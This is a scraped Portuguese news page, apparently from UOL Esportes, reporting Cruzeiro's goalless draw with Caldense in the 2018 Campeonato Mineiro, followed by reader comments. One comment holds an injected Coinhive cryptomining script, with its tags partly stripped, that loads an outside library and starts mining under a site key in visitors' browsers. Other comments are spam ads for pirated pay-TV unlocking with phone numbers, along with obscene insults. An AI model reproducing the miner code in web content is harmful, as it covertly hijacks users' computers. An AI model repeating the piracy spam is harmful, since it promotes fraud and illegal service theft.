logo

20/1/2018 23:29

Cruzeiro cria pouco, não vence a Caldense e perder até cinco posições

Cruzeiro cria pouco, não vence a Caldense e perder até cinco posições
Por ter um setor ofensivo tão poderoso, o Cruzeiro é tido como um dos times favoritos aos grandes títulos em 2018. No segundo teste da temporada, contra a Caldense, pelo Campeonato Mineiro, no Estádio Ronaldão, em Poços de Caldas, a Raposa não conseguiu demostrar todo o poder que tem no ataque. Criou muito pouco e empatou em 0 a 0 com a Caldense.


Apesar de ser apenas o início da competição, o resultado pode tirar o Cruzeiro da liderança do Campeonato Mineiro. A Raposa pode perder até cinco posições, dependendo dos resultados que completam a rodada. O próximo compromisso pelo Estadual é contra o Uberlândia, na quarta-feira (24), às 21h45, no Mineirão.

Fred foi quem mais sofreu em Poços de Caldas
Pela característica de jogo, Fred é um jogador que depende muito dos companheiros. O centroavante joga entre os defensores rivais e precisa ser municiado pelos demais atletas para aparecer na partida. Em uma noite que o Cruzeiro teve dificuldades para criar, o centroavante conseguiu finalizar somente duas vezes em pouco mais de 90 minutos de jogo. Com isso, o atacante segue sem fazer gols desde que retornou ao Cruzeiro.

Bruno Silva suporta apenas 45 minutos
Titular do Cruzeiro pela primeira vez, o volante Bruno Silva teve uma atuação discreta em Poços de Caldas. O camisa 20 da Raposa conseguiu se movimentar bem, mas o gás acabou. Já no final do primeiro tempo era possível notar que um dos reforços celestes para 2018 já não acompanhava o ritmo do jogo. Por esse motivo, Bruno Silva não voltou para o segundo tempo, dando lugar a Robinho, que é o titular da equipe.

Sem problemas com o uniforme
Na estreia do Cruzeiro no Campeonato Mineiro, contra o Tupi, um erro interno fez com que alguns jogadores atuassem com camisas diferentes. O zagueiro Léo, por exemplo, atuou o primeiro tempo sem exibir a marca do principal patrocinador na parte frontal da camisa. Fred, Bruno Silva e Digão foram outros jogadores que também estavam com uniformes diferentes dos demais. Problema que foi corrigido contra a Caldense. Todos os jogadores usaram camisas iguais.

Primeiro tempo de poucas chances e destaque para Omar
O Cruzeiro teve mais a posse de bola, como já era esperado. Mas o grande nome da etapa inicial foi do goleiro Omar, da Caldense. Numa etapa em que as duas equipes criaram poucas oportunidades, o camisa 1 do time da casa fez duas defesas determinantes para manter o placar de igualdade nos primeiros 45 minutos, nas tentativas de Manoel e Romero.

Caldense surpreende pela troca de passes
Apesar de toda a disparidade entre os dois clubes, a Caldense conseguiu fazer um bom primeiro tempo contra o Cruzeiro. Obviamente com uma postura mais defensiva, alto totalmente normal diante de uma equipe tão qualificada, como é o Cruzeiro, a Veterana surpreendeu pela boa e rápida troca de passes.

Segundo tempo com menos oportunidades ainda
Se a primeira etapa foi com poucos lances de perigo, dois para cada lado, a segunda parte do jogo teve ainda menos oportunidades de gols para as duas equipes. O Cruzeiro conseguiu controlar ainda mais o jogo, evitando que a Caldense trocasse tantos passes, como estava acontecendo. Por outro lado, a Raposa quase não conseguiu chegar ao gol defendido por Omar.

Grama diferente e campo pesado
Uma das justificativas dos jogadores cruzeirenses para o tropeço em Poços de Caldas foi o estado do gramado do Estádio Ronaldão. Não é que o campo está ruim, mas é uma grama diferente daquela que os jogadores cruzeirenses estão acostumados, como era usada nos principais estádios do país até a década de 1990. Por isso, além de ser um piso diferente, o campo estava "pesado", o que tornou o jogo um pouco mais lento do que o habitual.

4767 visitas - Fonte: Uol Esportes




VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Cadê o Fred cadê Bruno Silva que o Cruzeiro tanto corre o atrás pra que pra andar em campo. Desse jeito pode entregar o rural pras frangas. Esses cara pensam que está fazendo um ao vestir a camisa do cruzeiro. O Kali plantou o Fred no cruzeiro pra fuder o time e os baba as dos torcedores ainda vão ajudar a pagar multa. Com essa preguiça vai passar e vergonha na liberta. Ainda falam em mundial só se for futebol de botão. Será que o Ronaldo gordo tava certo na toca da raposa os jogadores passam fome. Porque todos os tem raça enquanto o Cruzeiro anda em campo. É triste . Mais da do ver esses cara andando em campo , e um bando trouxas na arquibancada gritando

Erro ao postar comentário.
Código do erro: 803743

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

contra o Cruzeiro e assim todo mundo come ate bola e bati muito mais contra as franga essa porqueira da cladense abra as perna e o ferro entra no cu dos jogadores deles e perde de goleada

cadê o fede diretoria burra?

desculpas esfarrapadas , e esse cara fede mesmo joga nada o cruzeiro se lascou com essa contratação.

jogo ridículo. jogar c Fred é jogar com 10

Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui.